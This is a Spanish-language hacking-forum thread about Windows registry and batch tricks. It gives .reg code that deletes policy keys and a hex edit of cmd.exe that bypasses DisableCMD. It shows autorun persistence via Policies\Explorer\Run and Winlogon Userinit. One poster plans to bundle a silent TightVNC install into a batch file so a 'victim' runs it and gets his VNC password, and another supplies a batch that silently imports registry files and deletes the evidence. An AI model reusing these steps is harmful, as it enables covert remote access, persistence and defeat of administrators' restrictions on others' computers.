Autor
|
Tema: Batch y Registro de Windows - Juguemos!!! (Leído 49,482 veces)
|
carlitos.dll
Desconectado
Mensajes: 266
|
Por cierto, yo también he estudiado el registro, y me gusta mucho. Si quiero eliminar un registro específico, la otra vez leí que no se podía con los reg sino que solamente con inf, pero si se puede y es asi: [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows] "load"=- colocas en el contenido un guion, y listo, ejecutas el reg y se borra Claro, simplemente renombrando el el valor a un valor nulo (valga la redundancia). No es un valor vacio, estoy eliminando, porque si lo hago así: [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows] "load"="" estoy dejando la misma clave sin contenido, pero con el guion la borro, ojo que sin comillas el guion, porque sino lo toma como contenido. También, si no estoy con cuenta limitada, puedo borrarme la mayoría de las policies así: REGEDIT4 [-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\] [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\] [-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\] [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\] Sobre lo de ejecutar comandos dos, la otra vez le decía a un compañero que con el DisableCMD no se podían ejecutar comandos, pero cual fue la sorpresa, al ver que si se podían, por ejemplo, con el c99shell, quizás con cmdow (no lo he probado, porque algunos antivirus dicen que es malicioso), pero me refiero a que Windows sigue igual de desprotegido a comándos de shell si se deshabiliata el CMD.
|
|
« Última modificación: 12 Junio 2008, 07:49 am por carlitos.dll »
|
En línea
|
|
|
|
Crazy.sx
Desconectado
Mensajes: 447
|
No es un valor vacio, estoy eliminando, porque si lo hago así: [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows] "load"=""
Elimina: [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows] "load"=-
Ahpsss, tenes razon, no renombras nada. Sencillamente elimina el valor del registro. Sobre lo de ejecutar comandos dos, la otra vez le decía a un compañero que con el DisableCMD no se podían ejecutar comandos, pero cual fue la sorpresa, al ver que si se podían, por ejemplo, con el c99shell, quizás con cmdow (no lo he probado, porque algunos antivirus dicen que es malicioso), pero me refiero a que Windows sigue igual de desprotegido a comándos de shell si se deshabiliata el CMD. Y... Windows es vulnerable por donde lo veas. Si no es por "aqui" es por "allá", jajaja. Probando y probando cualquiera.
|
|
« Última modificación: 3 Abril 2014, 15:47 pm por Loco.AR »
|
En línea
|
Destruir K. LOL
|
|
|
carlitos.dll
Desconectado
Mensajes: 266
|
Sobre lo de ejecutar comandos dos, la otra vez le decía a un compañero que con el DisableCMD no se podían ejecutar comandos, pero cual fue la sorpresa, al ver que si se podían, por ejemplo, con el c99shell, quizás con cmdow (no lo he probado, porque algunos antivirus dicen que es malicioso), pero me refiero a que Windows sigue igual de desprotegido a comándos de shell si se deshabiliata el CMD. Recién he descubierto (aunque de seguro muchos lo sabían) que modificando el cmd.exe con un editor hexadecimal, los valores: 4400 6900 7300 6100 6200 6C00 6500 4300 4D00 4400 por 2000 2000 2000 2000 2000 2000 2000 2000 2000 2000 ya no lee la restricción del registro, y por lo tanto deja de ser efectiva. Similar es en regedit.exe Qué mala protección, está dirigida a la aplicación no al sistema operativo.
|
|
« Última modificación: 15 Junio 2008, 20:46 pm por carlitos.dll »
|
En línea
|
|
|
|
Crazy.sx
Desconectado
Mensajes: 447
|
Sobre lo de ejecutar comandos dos, la otra vez le decía a un compañero que con el DisableCMD no se podían ejecutar comandos, pero cual fue la sorpresa, al ver que si se podían, por ejemplo, con el c99shell, quizás con cmdow (no lo he probado, porque algunos antivirus dicen que es malicioso), pero me refiero a que Windows sigue igual de desprotegido a comándos de shell si se deshabiliata el CMD. Recién he descubierto (aunque de seguro muchos lo sabían) que modificando el cmd.exe con un editor hexadecimal, los valores: 4400 6900 7300 6100 6200 6C00 6500 4300 4D00 4400 por 2000 2000 2000 2000 2000 2000 2000 2000 2000 2000 ya no lee la restricción del registro, y por lo tanto deja de ser efectiva. Similar es en regedit.exe Qué mala protección, está dirigida a la aplicación no al sistema operativo. Buen dato, jejeje
Ahora, otra manera para arrancar un programa al inicio: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v Valor_del_Autoarranque /t Reg_Sz /d Ruta\del\archivo.exe Mmm, no se si vi bien en mi msconfig pero al hacer esto no aparece en la lista de los programas que se ejecutan al inicio. Prueben y me comentan. Aclaro que todos estos códigos los he probado en mi PC y funcionan, es por las dudas alguien diga cosas que se pueden imaginar. Saludos
|
|
|
En línea
|
Destruir K. LOL
|
|
|
carlitos.dll
Desconectado
Mensajes: 266
|
Otra forma de iniciar programas al inicio es esta:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "Userinit"="C:\\WINDOWS\\system32\\userinit.exe,calc.exe"
separas los programas por comas.
|
|
|
En línea
|
|
|
|
Crazy.sx
Desconectado
Mensajes: 447
|
Eso no lo sabia sinceramente, lo voy a probar haber que onda con esto. Saludos
|
|
|
En línea
|
Destruir K. LOL
|
|
|
MagnoBalt
Desconectado
Mensajes: 58
Los Buenos Artitas Copian, los Grandes Roban
|
Hola q tall como les va? tengo un problema a ver si me lo pueden solucionarr.. no se si este tema podra ir aca asi q si le pido disculpas.. Resulta que se me ocurrio una idea.. Con el VNCtigth se puede ahcer una intalacion silenciosa poniendo este comando: tightvnc-1.3.9-setup.exe /sp- /verysilent Le dejo el link donde pueden ver http://www.tightvnc.com/winst.htmlEntonces la onda es crear un batch y empaquetar con el intalador del tigthVNC asi q cuando la victima ejecute se instale de forma silenciosa.. Bueno el problema es q nesesito copiar las entradas de mi registro del password y pegarles en las entradas de la victima..para tener el mismo pass q seria en esta direccion * HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3\Password * HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password Cual seria el comando para asignar valores a las claves binarias? un Abrazo
|
|
|
En línea
|
|
|
|
MagnoBalt
Desconectado
Mensajes: 58
Los Buenos Artitas Copian, los Grandes Roban
|
Disculpenn encontre la forma en realidad lo q tengo q hacer es exportar estas dor partes * HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3 * HKEY_CURRENT_USER\Software\ORL\WinVNC3 ahora con esas dos exportaciones creo dos archivos .reg hay una forma de agregar los archivos .reg al batch.. y realizar la inserccion de un modo silencioso??
|
|
|
En línea
|
|
|
|
Crazy.sx
Desconectado
Mensajes: 447
|
Disculpenn encontre la forma en realidad lo q tengo q hacer es exportar estas dor partes * HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3 * HKEY_CURRENT_USER\Software\ORL\WinVNC3 ahora con esas dos exportaciones creo dos archivos .reg hay una forma de agregar los archivos .reg al batch.. y realizar la inserccion de un modo silencioso??
Si y es fácil. Fijate en los anteriores post, creo que puse algunos ejemplos sobre esto. Por ejemplo: Echo REGEDIT4>registros1.reg
Echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] >>registros1.reg
Echo "disableregistrytools"=dword:00000001>>registros1.reg Regedit /s registros1.reg Del registros1.reg Solo tené en cuenta que si no sabes la version del regedit, entonces le pones REGEDIT4 -yo a todo le pongo asi- y mirá la parte última despues de los valores, el tipo y datos que coloqué los siguiente: Regedit /s registros1.reg Donde registros1.reg es el nombre del archivo en donde estan todas las claves del registro. Y empleo regedit /s para ejecutar el archivo en modo silencioso y sin que saltara ningun mensaje (Forzado). Luego le pongo: Para eliminar tal archivo. Sino mirá este post, ahi puse varios ejemplos de como creo y ejecuto el archivo .reg en modo silencioso en el script: http://foro.elhacker.net/hacking_basico/manual_creando_un_downloader_en_batch_ataques_con_noip_servu_radmin21-t186544.0.html;msg967353#msg967353Saludos.
|
|
« Última modificación: 3 Abril 2014, 15:48 pm por Loco.AR »
|
En línea
|
Destruir K. LOL
|
|
|
MagnoBalt
Desconectado
Mensajes: 58
Los Buenos Artitas Copian, los Grandes Roban
|
Hola como estas Lukhardy andube mirando todos tus post y estan muy buenos y me saco una duda q te iba a preguntar sobre algun joiner y vi el que realizaste sobre Manual: JOINER con Quick Batch File Compiler asi q me lo termine bajando.. ahh lo q si en el link q das q es http://414141.iespana.es/ no esta!! Bueno gracias por responder la duda q tenia sobre como agregar un .reg de forma silenciosa tengo dos consultas 1) me podrias decir q hace especificamente esta linea Echo "disableregistrytools"=dword:00000001>>registros1.reg 2)Cual es el comando q realiza una pausa asignandole segundos.. q se comporte como el comnado SLEEP de GNU/LINUX Graciass.. un abrazoo
|
|
« Última modificación: 20 Julio 2008, 23:40 pm por MagnoBalt »
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Sistema de Login - Registro [Usando el registro de Windows]
Programación Visual Basic
|
ToNy_EsP
|
2
|
4,247
|
28 Febrero 2009, 18:10 pm
por seba123neo
|
|
|
ayuda! agregar valor en exa al registro de windows [batch]
Programación General
|
guidosl
|
1
|
6,043
|
29 Marzo 2018, 00:08 am
por sidex_sk8
|
|
|
Registro de Windows(batch)
Scripting
|
Napster.A530
|
1
|
2,701
|
22 Julio 2010, 20:43 pm
por maxx93
|
|
|
[Batch] obtener clave del registro de Windows
« 1 2 »
Scripting
|
jimbus80
|
10
|
14,849
|
11 Febrero 2011, 22:04 pm
por jimbus80
|
|
|
[AYUDA] [BATCH] Batch sencillo para comparar un valor del registro de windows
Scripting
|
Davigotchi
|
6
|
5,100
|
27 Febrero 2020, 20:40 pm
por Davigotchi
|
|